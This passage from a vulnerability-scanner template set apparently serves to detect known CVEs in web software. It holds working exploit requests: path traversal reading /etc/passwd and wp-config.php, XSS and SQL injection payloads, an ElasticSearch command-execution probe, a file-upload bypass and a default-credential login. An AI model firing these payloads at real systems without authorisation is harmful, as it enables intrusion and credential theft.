Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1635","info":{"name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Range":"bytes=0-18446744073709551615"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HTTP Error 416","The requested range is not satisfiable"],"condition":"and"},{"type":"word","part":"header","words":["Microsoft"]}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Symposium","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4455","info":{"name":"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\n","POST /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa\n\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"field_id\"\n\n3\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"form_id\"\n\n1\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"gform_unique_id\"\n\n../../../\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"name\"\n\n{{filename}}.phtml\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.jpg\"\nContent-Type: text/html\n\n{{randstr}}\n--a54906fe12c504cb01ca836d062f82fa--\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Failed to upload file\")","status_code_2 == 200","contains(body_2, \"uploaded_filename\\\":\\\"{{filename}}.jpg\")"],"condition":"and"}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Navis","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SourceAfrica","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9323","info":{"name":"404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(7))XXX)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"404-to-301\")"],"condition":"and"}]}]},{"id":"CVE-2015-20067","info":{"name":"WP Attachment Export < 0.2.4 - Unrestricted File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true","{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/xml\")","contains_all(body, \"title\",\"wp:author_id\",\"wp:author_email\")"],"condition":"and"}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Church Admin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7282","info":{"name":"TITool PrintMonitor - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"PrintMonitor\") && contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site 